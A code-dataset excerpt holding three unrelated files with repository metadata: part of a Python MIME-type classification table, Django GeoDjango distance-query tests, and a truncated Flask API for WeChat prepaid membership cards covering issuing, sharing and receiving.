"image/x-xcf": Interpretation.RASTER_IMAGE,
"image/svg+xml": Interpretation.VECTOR_IMAGE,
"image/vnd.microsoft.icon": Interpretation.ICON,
# Audio
"application/ogg": Interpretation.AUDIO,
"audio/x-scpls": Interpretation.MEDIA_LIST,
# Development files
"application/ecmascript": Interpretation.SOURCE_CODE,
"application/javascript": Interpretation.SOURCE_CODE,
"application/json": Interpretation.SOURCE_CODE,
"application/soap+xml": Interpretation.SOURCE_CODE,
"application/xml-dtd": Interpretation.SOURCE_CODE,
"application/x-csh": Interpretation.SOURCE_CODE,
"application/x-designer": Interpretation.SOURCE_CODE,
"application/x-dia-diagram": Interpretation.SOURCE_CODE,
"application/x-fluid": Interpretation.SOURCE_CODE,
"application/x-glade": Interpretation.SOURCE_CODE,
"application/xhtml+xml": Interpretation.SOURCE_CODE,
"application/x-java-archive": Interpretation.SOURCE_CODE,
"application/x-javascript": Interpretation.SOURCE_CODE,
"application/x-m4": Interpretation.SOURCE_CODE,
"application/xml": Interpretation.SOURCE_CODE,
"application/x-perl": Interpretation.SOURCE_CODE,
"application/x-php": Interpretation.SOURCE_CODE,
"application/x-ruby": Interpretation.SOURCE_CODE,
"application/x-shellscript": Interpretation.SOURCE_CODE,
"application/x-sql": Interpretation.SOURCE_CODE,
"text/css": Interpretation.SOURCE_CODE,
"text/javascript": Interpretation.SOURCE_CODE,
"text/xml": Interpretation.SOURCE_CODE,
"text/x-c": Interpretation.SOURCE_CODE,
"text/x-c++": Interpretation.SOURCE_CODE,
"text/x-chdr": Interpretation.SOURCE_CODE,
"text/x-copying": Interpretation.SOURCE_CODE,
"text/x-credits": Interpretation.SOURCE_CODE,
"text/x-csharp": Interpretation.SOURCE_CODE,
"text/x-c++src": Interpretation.SOURCE_CODE,
"text/x-csrc": Interpretation.SOURCE_CODE,
"text/x-dsrc": Interpretation.SOURCE_CODE,
"text/x-eiffel": Interpretation.SOURCE_CODE,
"text/x-gettext-translation": Interpretation.SOURCE_CODE,
"text/x-gettext-translation-template": Interpretation.SOURCE_CODE,
"text/x-haskell": Interpretation.SOURCE_CODE,
"text/x-idl": Interpretation.SOURCE_CODE,
"text/x-java": Interpretation.SOURCE_CODE,
"text/x-lisp": Interpretation.SOURCE_CODE,
"text/x-lua": Interpretation.SOURCE_CODE,
"text/x-makefile": Interpretation.SOURCE_CODE,
"text/x-objcsrc": Interpretation.SOURCE_CODE,
"text/x-ocaml": Interpretation.SOURCE_CODE,
"text/x-pascal": Interpretation.SOURCE_CODE,
"text/x-patch": Interpretation.SOURCE_CODE,
"text/x-python": Interpretation.SOURCE_CODE,
"text/x-sql": Interpretation.SOURCE_CODE,
"text/x-tcl": Interpretation.SOURCE_CODE,
"text/x-troff": Interpretation.SOURCE_CODE,
"text/x-vala": Interpretation.SOURCE_CODE,
"text/x-vhdl": Interpretation.SOURCE_CODE,
"text/x-m4": Interpretation.SOURCE_CODE,
"text/x-jquery-tmpl": Interpretation.SOURCE_CODE,
# Email
"message/alternative": Interpretation.EMAIL,
"message/partial": Interpretation.EMAIL,
"message/related": Interpretation.EMAIL,
# People
"text/vcard": Interpretation.CONTACT,
# Archives
"application/zip": Interpretation.ARCHIVE,
"application/x-gzip": Interpretation.ARCHIVE,
"application/x-bzip": Interpretation.ARCHIVE,
"application/x-lzma": Interpretation.ARCHIVE,
"application/x-archive": Interpretation.ARCHIVE,
"application/x-7z-compressed": Interpretation.ARCHIVE,
"application/x-bzip-compressed-tar": Interpretation.ARCHIVE,
"application/x-lzma-compressed-tar": Interpretation.ARCHIVE,
"application/x-compressed-tar": Interpretation.ARCHIVE,
"application/x-stuffit": Interpretation.ARCHIVE,
# Software and packages
"application/x-deb": Interpretation.SOFTWARE,
"application/x-rpm": Interpretation.SOFTWARE,
"application/x-ms-dos-executable": Interpretation.SOFTWARE,
"application/x-executable": Interpretation.SOFTWARE,
"application/x-desktop": Interpretation.SOFTWARE,
"application/x-shockwave-flash": Interpretation.EXECUTABLE,
# File systems
"application/x-cd-image": Interpretation.FILESYSTEM_IMAGE,
"inode/directory": Interpretation.FOLDER,
}
MIMES_REGEX = make_regex_tuple(
# Star Office and OO.org
("application/vnd.oasis.opendocument.text.*", Interpretation.PAGINATED_TEXT_DOCUMENT),
("application/vnd.oasis.opendocument.presentation.*", Interpretation.PRESENTATION),
("application/vnd.oasis.opendocument.spreadsheet.*", Interpretation.SPREADSHEET),
("application/vnd.oasis.opendocument.graphics.*", Interpretation.VECTOR_IMAGE),
("application/vnd\\..*", Interpretation.DOCUMENT),
# x-applix-*
("application/x-applix-.*", Interpretation.DOCUMENT),
# MS
("application/vnd.ms-excel.*", Interpretation.SPREADSHEET),
("application/vnd.ms-powerpoint.*", Interpretation.PRESENTATION),
("application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.*", Interpretation.SPREADSHEET),
("application/vnd.openxmlformats-officedocument.presentationml.presentation.*", Interpretation.PRESENTATION),
("application/vnd.openxmlformats-officedocument.wordprocessingml.document.*", Interpretation.PAGINATED_TEXT_DOCUMENT),
# TeX stuff
(".*/x-dvi", Interpretation.PAGINATED_TEXT_DOCUMENT),
# Image types
("image/.*", Interpretation.IMAGE),
# Audio
("audio/.*", Interpretation.AUDIO),
# Video
("video/.*", Interpretation.VIDEO),
)
SCHEMES = tuple((
("file://", Manifestation.FILE_DATA_OBJECT),
("http://", Manifestation.WEB_DATA_OBJECT),
("https://", Manifestation.WEB_DATA_OBJECT),
("ssh://", Manifestation.REMOTE_DATA_OBJECT),
("sftp://", Manifestation.REMOTE_DATA_OBJECT),
("ftp://", Manifestation.REMOTE_DATA_OBJECT),
("dav://", Manifestation.REMOTE_DATA_OBJECT),
("davs://", Manifestation.REMOTE_DATA_OBJECT),
("smb://", Manifestation.REMOTE_DATA_OBJECT),
))
# vim:noexpandtab:ts=4:sw=4
| mit | 4,473,382,630,904,761,300 | -145,166,229,906,814,700 | 40.498024 | 122 | 0.714544 | false |
sodafree/backend | build/lib.linux-i686-2.7/django/contrib/gis/tests/distapp/tests.py | 96 | 19051 | from __future__ import absolute_import
from django.db import connection
from django.db.models import Q
from django.contrib.gis.geos import GEOSGeometry, LineString
from django.contrib.gis.measure import D # alias for Distance
from django.contrib.gis.tests.utils import oracle, postgis, spatialite, no_oracle, no_spatialite
from django.test import TestCase
from .models import (AustraliaCity, Interstate, SouthTexasInterstate,
SouthTexasCity, SouthTexasCityFt, CensusZipcode, SouthTexasZipcode)
class DistanceTest(TestCase):
# A point we are testing distances with -- using a WGS84
# coordinate that'll be implicitly transormed to that to
# the coordinate system of the field, EPSG:32140 (Texas South Central
# w/units in meters)
stx_pnt = GEOSGeometry('POINT (-95.370401017314293 29.704867409475465)', 4326)
# Another one for Australia
au_pnt = GEOSGeometry('POINT (150.791 -34.4919)', 4326)
def get_names(self, qs):
cities = [c.name for c in qs]
cities.sort()
return cities
def test01_init(self):
"Test initialization of distance models."
self.assertEqual(9, SouthTexasCity.objects.count())
self.assertEqual(9, SouthTexasCityFt.objects.count())
self.assertEqual(11, AustraliaCity.objects.count())
self.assertEqual(4, SouthTexasZipcode.objects.count())
self.assertEqual(4, CensusZipcode.objects.count())
self.assertEqual(1, Interstate.objects.count())
self.assertEqual(1, SouthTexasInterstate.objects.count())
@no_spatialite
def test02_dwithin(self):
"Testing the `dwithin` lookup type."
# Distances -- all should be equal (except for the
# degree/meter pair in au_cities, that's somewhat
# approximate).
tx_dists = [(7000, 22965.83), D(km=7), D(mi=4.349)]
au_dists = [(0.5, 32000), D(km=32), D(mi=19.884)]
# Expected cities for Australia and Texas.
tx_cities = ['Downtown Houston', 'Southside Place']
au_cities = ['Mittagong', 'Shellharbour', 'Thirroul', 'Wollongong']
# Performing distance queries on two projected coordinate systems one
# with units in meters and the other in units of U.S. survey feet.
for dist in tx_dists:
if isinstance(dist, tuple): dist1, dist2 = dist
else: dist1 = dist2 = dist
qs1 = SouthTexasCity.objects.filter(point__dwithin=(self.stx_pnt, dist1))
qs2 = SouthTexasCityFt.objects.filter(point__dwithin=(self.stx_pnt, dist2))
for qs in qs1, qs2:
self.assertEqual(tx_cities, self.get_names(qs))
# Now performing the `dwithin` queries on a geodetic coordinate system.
for dist in au_dists:
if isinstance(dist, D) and not oracle: type_error = True
else: type_error = False
if isinstance(dist, tuple):
if oracle: dist = dist[1]
else: dist = dist[0]
# Creating the query set.
qs = AustraliaCity.objects.order_by('name')
if type_error:
# A ValueError should be raised on PostGIS when trying to pass
# Distance objects into a DWithin query using a geodetic field.
self.assertRaises(ValueError, AustraliaCity.objects.filter(point__dwithin=(self.au_pnt, dist)).count)
else:
self.assertEqual(au_cities, self.get_names(qs.filter(point__dwithin=(self.au_pnt, dist))))
def test03a_distance_method(self):
"Testing the `distance` GeoQuerySet method on projected coordinate systems."
# The point for La Grange, TX
lagrange = GEOSGeometry('POINT(-96.876369 29.905320)', 4326)
# Reference distances in feet and in meters. Got these values from
# using the provided raw SQL statements.
# SELECT ST_Distance(point, ST_Transform(ST_GeomFromText('POINT(-96.876369 29.905320)', 4326), 32140)) FROM distapp_southtexascity;
m_distances = [147075.069813, 139630.198056, 140888.552826,
138809.684197, 158309.246259, 212183.594374,
70870.188967, 165337.758878, 139196.085105]
# SELECT ST_Distance(point, ST_Transform(ST_GeomFromText('POINT(-96.876369 29.905320)', 4326), 2278)) FROM distapp_southtexascityft;
# Oracle 11 thinks this is not a projected coordinate system, so it's s
# not tested.
ft_distances = [482528.79154625, 458103.408123001, 462231.860397575,
455411.438904354, 519386.252102563, 696139.009211594,
232513.278304279, 542445.630586414, 456679.155883207]
# Testing using different variations of parameters and using models
# with different projected coordinate systems.
dist1 = SouthTexasCity.objects.distance(lagrange, field_name='point')
dist2 = SouthTexasCity.objects.distance(lagrange) # Using GEOSGeometry parameter
if spatialite or oracle:
dist_qs = [dist1, dist2]
else:
dist3 = SouthTexasCityFt.objects.distance(lagrange.ewkt) # Using EWKT string parameter.
dist4 = SouthTexasCityFt.objects.distance(lagrange)
dist_qs = [dist1, dist2, dist3, dist4]
# Original query done on PostGIS, have to adjust AlmostEqual tolerance
# for Oracle.
if oracle: tol = 2
else: tol = 5
# Ensuring expected distances are returned for each distance queryset.
for qs in dist_qs:
for i, c in enumerate(qs):
self.assertAlmostEqual(m_distances[i], c.distance.m, tol)
self.assertAlmostEqual(ft_distances[i], c.distance.survey_ft, tol)
@no_spatialite
def test03b_distance_method(self):
"Testing the `distance` GeoQuerySet method on geodetic coordnate systems."
if oracle: tol = 2
else: tol = 5
# Testing geodetic distance calculation with a non-point geometry
# (a LineString of Wollongong and Shellharbour coords).
ls = LineString( ( (150.902, -34.4245), (150.87, -34.5789) ) )
if oracle or connection.ops.geography:
# Reference query:
# SELECT ST_distance_sphere(point, ST_GeomFromText('LINESTRING(150.9020 -34.4245,150.8700 -34.5789)', 4326)) FROM distapp_australiacity ORDER BY name;
distances = [1120954.92533513, 140575.720018241, 640396.662906304,
60580.9693849269, 972807.955955075, 568451.8357838,
40435.4335201384, 0, 68272.3896586844, 12375.0643697706, 0]
qs = AustraliaCity.objects.distance(ls).order_by('name')
for city, distance in zip(qs, distances):
# Testing equivalence to within a meter.
self.assertAlmostEqual(distance, city.distance.m, 0)
else:
# PostGIS 1.4 and below is limited to disance queries only
# to/from point geometries, check for raising of ValueError.
self.assertRaises(ValueError, AustraliaCity.objects.distance, ls)
self.assertRaises(ValueError, AustraliaCity.objects.distance, ls.wkt)
# Got the reference distances using the raw SQL statements:
# SELECT ST_distance_spheroid(point, ST_GeomFromText('POINT(151.231341 -33.952685)', 4326), 'SPHEROID["WGS 84",6378137.0,298.257223563]') FROM distapp_australiacity WHERE (NOT (id = 11));
# SELECT ST_distance_sphere(point, ST_GeomFromText('POINT(151.231341 -33.952685)', 4326)) FROM distapp_australiacity WHERE (NOT (id = 11)); st_distance_sphere
if connection.ops.postgis and connection.ops.proj_version_tuple() >= (4, 7, 0):
# PROJ.4 versions 4.7+ have updated datums, and thus different
# distance values.
spheroid_distances = [60504.0628957201, 77023.9489850262, 49154.8867574404,
90847.4358768573, 217402.811919332, 709599.234564757,
640011.483550888, 7772.00667991925, 1047861.78619339,
1165126.55236034]
sphere_distances = [60580.9693849267, 77144.0435286473, 49199.4415344719,
90804.7533823494, 217713.384600405, 709134.127242793,
639828.157159169, 7786.82949717788, 1049204.06569028,
1162623.7238134]
else:
spheroid_distances = [60504.0628825298, 77023.948962654, 49154.8867507115,
90847.435881812, 217402.811862568, 709599.234619957,
640011.483583758, 7772.00667666425, 1047861.7859506,
1165126.55237647]
sphere_distances = [60580.7612632291, 77143.7785056615, 49199.2725132184,
90804.4414289463, 217712.63666124, 709131.691061906,
639825.959074112, 7786.80274606706, 1049200.46122281,
1162619.7297006]
# Testing with spheroid distances first.
hillsdale = AustraliaCity.objects.get(name='Hillsdale')
qs = AustraliaCity.objects.exclude(id=hillsdale.id).distance(hillsdale.point, spheroid=True)
for i, c in enumerate(qs):
self.assertAlmostEqual(spheroid_distances[i], c.distance.m, tol)
if postgis:
# PostGIS uses sphere-only distances by default, testing these as well.
qs = AustraliaCity.objects.exclude(id=hillsdale.id).distance(hillsdale.point)
for i, c in enumerate(qs):
self.assertAlmostEqual(sphere_distances[i], c.distance.m, tol)
@no_oracle # Oracle already handles geographic distance calculation.
def test03c_distance_method(self):
"Testing the `distance` GeoQuerySet method used with `transform` on a geographic field."
# Normally you can't compute distances from a geometry field
# that is not a PointField (on PostGIS 1.4 and below).
if not connection.ops.geography:
self.assertRaises(ValueError, CensusZipcode.objects.distance, self.stx_pnt)
# We'll be using a Polygon (created by buffering the centroid
# of 77005 to 100m) -- which aren't allowed in geographic distance
# queries normally, however our field has been transformed to
# a non-geographic system.
z = SouthTexasZipcode.objects.get(name='77005')
# Reference query:
# SELECT ST_Distance(ST_Transform("distapp_censuszipcode"."poly", 32140), ST_GeomFromText('<buffer_wkt>', 32140)) FROM "distapp_censuszipcode";
dists_m = [3553.30384972258, 1243.18391525602, 2186.15439472242]
# Having our buffer in the SRID of the transformation and of the field
# -- should get the same results. The first buffer has no need for
# transformation SQL because it is the same SRID as what was given
# to `transform()`. The second buffer will need to be transformed,
# however.
buf1 = z.poly.centroid.buffer(100)
buf2 = buf1.transform(4269, clone=True)
ref_zips = ['77002', '77025', '77401']
for buf in [buf1, buf2]:
qs = CensusZipcode.objects.exclude(name='77005').transform(32140).distance(buf)
self.assertEqual(ref_zips, self.get_names(qs))
for i, z in enumerate(qs):
self.assertAlmostEqual(z.distance.m, dists_m[i], 5)
def test04_distance_lookups(self):
"Testing the `distance_lt`, `distance_gt`, `distance_lte`, and `distance_gte` lookup types."
# Retrieving the cities within a 20km 'donut' w/a 7km radius 'hole'
# (thus, Houston and Southside place will be excluded as tested in
# the `test02_dwithin` above).
qs1 = SouthTexasCity.objects.filter(point__distance_gte=(self.stx_pnt, D(km=7))).filter(point__distance_lte=(self.stx_pnt, D(km=20)))
# Can't determine the units on SpatiaLite from PROJ.4 string, and
# Oracle 11 incorrectly thinks it is not projected.
if spatialite or oracle:
dist_qs = (qs1,)
else:
qs2 = SouthTexasCityFt.objects.filter(point__distance_gte=(self.stx_pnt, D(km=7))).filter(point__distance_lte=(self.stx_pnt, D(km=20)))
dist_qs = (qs1, qs2)
for qs in dist_qs:
cities = self.get_names(qs)
self.assertEqual(cities, ['Bellaire', 'Pearland', 'West University Place'])
# Doing a distance query using Polygons instead of a Point.
z = SouthTexasZipcode.objects.get(name='77005')
qs = SouthTexasZipcode.objects.exclude(name='77005').filter(poly__distance_lte=(z.poly, D(m=275)))
self.assertEqual(['77025', '77401'], self.get_names(qs))
# If we add a little more distance 77002 should be included.
qs = SouthTexasZipcode.objects.exclude(name='77005').filter(poly__distance_lte=(z.poly, D(m=300)))
self.assertEqual(['77002', '77025', '77401'], self.get_names(qs))
def test05_geodetic_distance_lookups(self):
"Testing distance lookups on geodetic coordinate systems."
# Line is from Canberra to Sydney. Query is for all other cities within
# a 100km of that line (which should exclude only Hobart & Adelaide).
line = GEOSGeometry('LINESTRING(144.9630 -37.8143,151.2607 -33.8870)', 4326)
dist_qs = AustraliaCity.objects.filter(point__distance_lte=(line, D(km=100)))
if oracle or connection.ops.geography:
# Oracle and PostGIS 1.5 can do distance lookups on arbitrary geometries.
self.assertEqual(9, dist_qs.count())
self.assertEqual(['Batemans Bay', 'Canberra', 'Hillsdale',
'Melbourne', 'Mittagong', 'Shellharbour',
'Sydney', 'Thirroul', 'Wollongong'],
self.get_names(dist_qs))
else:
# PostGIS 1.4 and below only allows geodetic distance queries (utilizing
# ST_Distance_Sphere/ST_Distance_Spheroid) from Points to PointFields
# on geometry columns.
self.assertRaises(ValueError, dist_qs.count)
# Ensured that a ValueError was raised, none of the rest of the test is
# support on this backend, so bail now.
if spatialite: return
# Too many params (4 in this case) should raise a ValueError.
self.assertRaises(ValueError, len,
AustraliaCity.objects.filter(point__distance_lte=('POINT(5 23)', D(km=100), 'spheroid', '4')))
# Not enough params should raise a ValueError.
self.assertRaises(ValueError, len,
AustraliaCity.objects.filter(point__distance_lte=('POINT(5 23)',)))
# Getting all cities w/in 550 miles of Hobart.
hobart = AustraliaCity.objects.get(name='Hobart')
qs = AustraliaCity.objects.exclude(name='Hobart').filter(point__distance_lte=(hobart.point, D(mi=550)))
cities = self.get_names(qs)
self.assertEqual(cities, ['Batemans Bay', 'Canberra', 'Melbourne'])
# Cities that are either really close or really far from Wollongong --
# and using different units of distance.
wollongong = AustraliaCity.objects.get(name='Wollongong')
d1, d2 = D(yd=19500), D(nm=400) # Yards (~17km) & Nautical miles.
# Normal geodetic distance lookup (uses `distance_sphere` on PostGIS.
gq1 = Q(point__distance_lte=(wollongong.point, d1))
gq2 = Q(point__distance_gte=(wollongong.point, d2))
qs1 = AustraliaCity.objects.exclude(name='Wollongong').filter(gq1 | gq2)
# Geodetic distance lookup but telling GeoDjango to use `distance_spheroid`
# instead (we should get the same results b/c accuracy variance won't matter
# in this test case).
if postgis:
gq3 = Q(point__distance_lte=(wollongong.point, d1, 'spheroid'))
gq4 = Q(point__distance_gte=(wollongong.point, d2, 'spheroid'))
qs2 = AustraliaCity.objects.exclude(name='Wollongong').filter(gq3 | gq4)
querysets = [qs1, qs2]
else:
querysets = [qs1]
for qs in querysets:
cities = self.get_names(qs)
self.assertEqual(cities, ['Adelaide', 'Hobart', 'Shellharbour', 'Thirroul'])
def test06_area(self):
"Testing the `area` GeoQuerySet method."
# Reference queries:
# SELECT ST_Area(poly) FROM distapp_southtexaszipcode;
area_sq_m = [5437908.90234375, 10183031.4389648, 11254471.0073242, 9881708.91772461]
# Tolerance has to be lower for Oracle and differences
# with GEOS 3.0.0RC4
tol = 2
for i, z in enumerate(SouthTexasZipcode.objects.area()):
self.assertAlmostEqual(area_sq_m[i], z.area.sq_m, tol)
def test07_length(self):
"Testing the `length` GeoQuerySet method."
# Reference query (should use `length_spheroid`).
# SELECT ST_length_spheroid(ST_GeomFromText('<wkt>', 4326) 'SPHEROID["WGS 84",6378137,298.257223563, AUTHORITY["EPSG","7030"]]');
len_m1 = 473504.769553813
len_m2 = 4617.668
if spatialite:
# Does not support geodetic coordinate systems.
self.assertRaises(ValueError, Interstate.objects.length)
else:
qs = Interstate.objects.length()
if oracle: tol = 2
else: tol = 5
self.assertAlmostEqual(len_m1, qs[0].length.m, tol)
# Now doing length on a projected coordinate system.
i10 = SouthTexasInterstate.objects.length().get(name='I-10')
self.assertAlmostEqual(len_m2, i10.length.m, 2)
@no_spatialite
def test08_perimeter(self):
"Testing the `perimeter` GeoQuerySet method."
# Reference query:
# SELECT ST_Perimeter(distapp_southtexaszipcode.poly) FROM distapp_southtexaszipcode;
perim_m = [18404.3550889361, 15627.2108551001, 20632.5588368978, 17094.5996143697]
if oracle: tol = 2
else: tol = 7
for i, z in enumerate(SouthTexasZipcode.objects.perimeter()):
self.assertAlmostEqual(perim_m[i], z.perimeter.m, tol)
# Running on points; should return 0.
for i, c in enumerate(SouthTexasCity.objects.perimeter(model_att='perim')):
self.assertEqual(0, c.perim.m)
def test09_measurement_null_fields(self):
"Testing the measurement GeoQuerySet methods on fields with NULL values."
# Creating SouthTexasZipcode w/NULL value.
SouthTexasZipcode.objects.create(name='78212')
# Performing distance/area queries against the NULL PolygonField,
# and ensuring the result of the operations is None.
htown = SouthTexasCity.objects.get(name='Downtown Houston')
z = SouthTexasZipcode.objects.distance(htown.point).area().get(name='78212')
self.assertEqual(None, z.distance)
self.assertEqual(None, z.area)
| bsd-3-clause | -1,692,011,365,034,976,300 | -137,739,755,328,607,280 | 52.215084 | 196 | 0.63624 | false |
davidvon/pipa-pay-server | admin/api/cards.py | 1 | 18567 | # -*- coding: utf-8 -*-
import datetime
import time
import traceback
from flask import request
from flask.ext.restful import Resource
from api import API_PREFIX
from api.order import create_order
from app import restful_api, db, logger
from cache.order import cache_qrcode_code, get_cache_order
from cache.weixin import get_cache_customer_cards, cache_customer_cards
from models import Customer, CustomerCard, CustomerTradeRecords, CustomerCardShare, Order
from utils.util import nonce_str
from wexin.helper import WeixinHelper
from wexin_pay.views import payable
__author__ = 'fengguanhua'
class ApiCardMembers(Resource):
def post(self):
args = request.values
logger.debug('[ApiCardMembers] in: args[%s]' % args)
openid = args.get("openid")
share = args.get("share")
cards = get_cache_customer_cards(openid)
if not cards:
customer_cards = CustomerCard.query.filter(CustomerCard.customer_id == openid) \
.order_by(CustomerCard.status.asc()).all()
cards = [
{'globalId': item.id,
'cardId': item.card_id,
'merchantId': item.card.merchant.id,
'cardCode': item.card_code,
'amount': item.amount,
'title': item.card.title,
'logo': item.card.merchant.logo,
'img': item.img or 'http://wx.cdn.pipapay.com/static/images/card_blue.png',
'status': item.status,
'expireDate': str(item.expire_date)} for item in customer_cards]
cache_customer_cards(openid, cards)
data = [card for card in cards if card['status'] < 3] if share else cards
logger.debug('[ApiCardMembers] out: result[0], data[%s]' % data)
return {"result": 0, "data": data}
class ApiCardDispatch(Resource):
def post(self):
args = request.values
logger.debug('[ApiCardDispatch] in: args[%s]' % args)
order_id = args.get('order_id')
try:
order = Order.query.filter_by(order_id=order_id).first()
if not order:
logger.warn('[ApiCardDispatch] order[%s] not exist' % order_id)
return {"result": 254}
expire_date = datetime.date.today() + datetime.timedelta(365 * 3) # TODO
count = CustomerCard.query.filter_by(order_id=order_id).count()
if count < order.card_count:
for i in range(count, order.card_count):
card = CustomerCard(customer_id=order.customer.openid, order_id=order_id, card_id=order.card_id,
amount=order.face_amount, expire_date=expire_date, status=0)
db.session.add(card)
db.session.commit()
output = {"result": 0, "data": {"count": order.card_count, "amount": order.face_amount}}
logger.debug('[ApiCardDispatch] out: return [%s]' % output)
return output
except Exception as e:
logger.error(traceback.print_exc())
logger.error('[ApiCardDispatch] order[%s] card dispatch exception:[%s]' % (order_id, e.message))
return {'result': 255, 'data': e.message}
class ApiWxCardStatusUpdate(Resource):
def post(self):
openid = args = None
try:
args = request.values
logger.debug('[ApiWxCardStatusUpdate] in: args[%s]' % args)
openid = args['openid']
card_global_id = args['cardGlobalId']
card = CustomerCard.query.get(card_global_id)
card.status = 1
db.session.add(card)
db.session.commit()
logger.info('[ApiWxCardStatusUpdate] customer[%s] arg[%s] card[code:%s] status update success' %
(openid, args, card.card_code))
return {'result': 0, 'data': card.card_code}
except Exception as e:
logger.error(traceback.print_exc())
logger.error('[ApiWxCardStatusUpdate] customer[%s] arg[%s] card status update error:[%s]' %
(openid, args, e.message))
return {'result': 255, 'data': e.message}
class ApiCardPayCode(Resource):
def post(self):
args = request.values
logger.debug('[ApiCardPayCode] in: args[%s]' % args)
card_id = args['cardId']
card_code = args['cardCode']
card = CustomerCard.query.filter_by(card_id=card_id, card_code=card_code).first()
if not card:
logger.warn('[ApiCardPayCode] card[id:%s,code:%s] not exist' % (card_id, card_code))
return {'result': 255}
data = {
'status': card.status,
'merchantName': card.card.merchant.name,
'cardName': card.card.title,
'amount': card.amount,
'qrcode': cache_qrcode_code(card_id, card_code)
}
logger.debug('[ApiCardPayCode] out: result[0] data[%s]' % data)
return {'result': 0, 'data': data}
class ApiCardPayRecords(Resource):
def post(self):
args = request.values
logger.debug('[ApiCardPayRecords] in: args[%s]' % args)
card_id = args['cardId']
left = datetime.date.today()
right = datetime.date.today() - datetime.timedelta(30)
records = CustomerTradeRecords.query.filter(CustomerTradeRecords.card_id == card_id,
CustomerTradeRecords.time.between(left, right)).all()
recharge_total = 0
expend_total = 0
for item in records:
if item.type == 0:
recharge_total += item.amount
else:
expend_total += item.amount
data = {
'rechargeTotal': recharge_total,
'expendTotal': expend_total,
'records': [{'merchantName': item.card.merchant.name,
'date': str(item.time),
'amount': item.amount} for item in records]
}
logger.debug('[ApiCardPayRecords] out: result[0] data[%s]' % args)
return {'result': 0, 'data': data}
class ApiCardShareCheck(Resource):
def post(self):
args = request.values
logger.debug('[ApiCardShareCheck] in: args[%s]' % args)
card_id = args['cardId']
open_id = args['openId']
card_code = args['cardCode']
if not card_code:
logger.warn('[ApiCardShareCheck] openid:%s card[id:%s] not banding' % (open_id, card_id))
return {'result': 254}
customer_card = CustomerCard.query.filter_by(customer_id=open_id, card_id=card_id, card_code=card_code).first()
if not customer_card:
logger.warn('[ApiCardShareCheck] openid:%s card[id:%s code:%s] not exist' % (open_id, card_id, card_code))
return {'result': 255}
if customer_card.status >= 3:
logger.debug('[ApiCardShareCheck] out: result[0] status[%s]' % customer_card.status)
return {'result': 0, 'status': customer_card.status} # 转赠中或已转赠
data = {'result': 0,
'status': customer_card.status,
'card': {
'sign': nonce_str(12),
'cardId': customer_card.card_id,
'cardCode': customer_card.card_code,
'cardName': customer_card.card.title,
'timestamp': str(int(time.time())),
'logo': customer_card.card.merchant.logo}
}
logger.debug('[ApiCardShareCheck] out: return[%s]' % data)
return data
class ApiCardShare(Resource):
def post(self):
args = request.values
logger.debug('[ApiCardShare] in: args[%s]' % args)
open_id = args['openId']
card_id = args['cardId']
card_code = args['cardCode']
sign = args['sign']
timestamp = args['timestamp']
content = args['content']
try:
card = CustomerCard.query.filter_by(customer_id=open_id, card_id=card_id, card_code=card_code).first()
card.status = 4 # 卡表状态更新为 4:转赠中
record = CustomerCardShare(share_customer_id=open_id, customer_card_id=card.id,
timestamp=timestamp, content=content, sign=sign, status=0)
db.session.add(card)
db.session.add(record)
db.session.commit()
logger.info('[ApiCardShare] customer[%s] result[0] card[%s] share ok' % (open_id, card_id))
return {'result': 0}
except Exception as e:
logger.error(traceback.print_exc())
logger.error('[ApiCardShare] customer[%s] card[%s] share error:%s' % (open_id, card_id, e.message))
return {'result': 255, 'data': e.message}
class ApiCardShareInfo(Resource):
def post(self):
args = request.values
logger.debug('[ApiCardShareInfo] in: args[%s]' % args)
open_id = args['openId']
card_id = args['cardId']
card_code = args['cardCode']
card = CustomerCard.query.filter_by(card_id=card_id, card_code=card_code).first()
if not card:
logger.warn('[ApiCardShareInfo] openid:%s card[id:%s code:%s] not exist' % (open_id, card_id, card_code))
return {'result': 254}
share = CustomerCardShare.query.filter_by(share_customer_id=open_id, customer_card_id=card.id).first()
acquire_customer = None
if share and share.acquire_customer_id:
acquire_customer = Customer.query.filter_by(openid=share.acquire_customer_id).first()
data = {'result': 0,
'data': {'status': '已领取' if share.status == 2 else '未领取',
'cardLogo': share.customer_card.card.merchant.logo,
'cardCode': card_code,
'cardName': share.customer_card.card.title,
'datetime': str(share.datetime),
'content': share.content,
'acquireUserImg': acquire_customer.head_image if acquire_customer else '',
'acquireUserName': acquire_customer.show_name() if acquire_customer else '',
}
}
logger.debug('[ApiCardShareInfo] out: return[%s]' % data)
return data
class ApiCardReceiveCheck(Resource):
def post(self):
args = request.values
logger.debug('[ApiCardReceiveCheck] in: args[%s]' % args)
sign = args['sign']
info = CustomerCardShare.query.filter_by(sign=sign).first()
if not info:
logger.warn('[ApiCardReceiveCheck] sign[%s] not exist' % sign)
return {'result': 255} # sign不存在
card = info.customer_card
data = {'result': 0,
'data': {
'giveUserHeadImg': info.share_customer.head_image,
'giveUsername': info.share_customer.show_name(),
'shareContent': info.content,
'cardStatus': card.status,
'giveStatus': info.status,
'acquireUserOpenId': info.acquire_customer_id}
}
logger.debug('[ApiCardReceiveCheck] out: return[%s]' % data)
return data
class ApiCardReceive(Resource):
def post(self):
args = request.values
logger.debug('[ApiCardReceive] in: args[%s]' % args)
sign = args['sign']
openid = args['openId']
need_commit = False
try:
info = CustomerCardShare.query.filter_by(sign=sign).first()
if not info:
logger.error('[ApiCardReceive] customer[%s] card[%s] not sharing' %
(openid, info.customer_card.card_code))
return {'result': 255} # sign不存在
new_card = CustomerCard.query.filter_by(customer_id=openid, card_code=info.customer_card.card_code,
card_id=info.customer_card.card_id).first()
if new_card:
if info.share_customer.openid == openid:
new_card.status = 0
db.session.add(new_card)
need_commit = True
else:
logger.info('[ApiCardReceive] customer[%s] card[%s] not exist' % (openid, info.customer_card_id))
old_card = CustomerCard.query.filter_by(customer_id=info.share_customer.openid,
card_id=info.customer_card.card_id,
card_code=info.customer_card.card_code).first()
new_card = CustomerCard(customer_id=openid, card_id=info.customer_card.card_id, img=old_card.img,
amount=old_card.amount, card_code=old_card.card_code,
expire_date=old_card.expire_date, status=0)
old_card.status = 5
db.session.add(old_card)
db.session.add(new_card)
need_commit = True
if info.status != 1:
info.acquire_customer_id = openid
info.status = 1
db.session.add(info)
need_commit = True
if need_commit:
db.session.commit()
logger.info('[ApiCardReceive] customer[%s] card[%s] received success' % (openid, new_card.card_code))
data = {'result': 0,
'data': {
'status': new_card.status,
"cardGlobalId": new_card.id,
'wxCardId': new_card.card.wx_card_id, # 微信卡券ID,可以chooseCard获取
'code': info.customer_card.card_code # 指定的卡券code码,只能被领一次。use_custom_code字段为true的卡券必须填写,
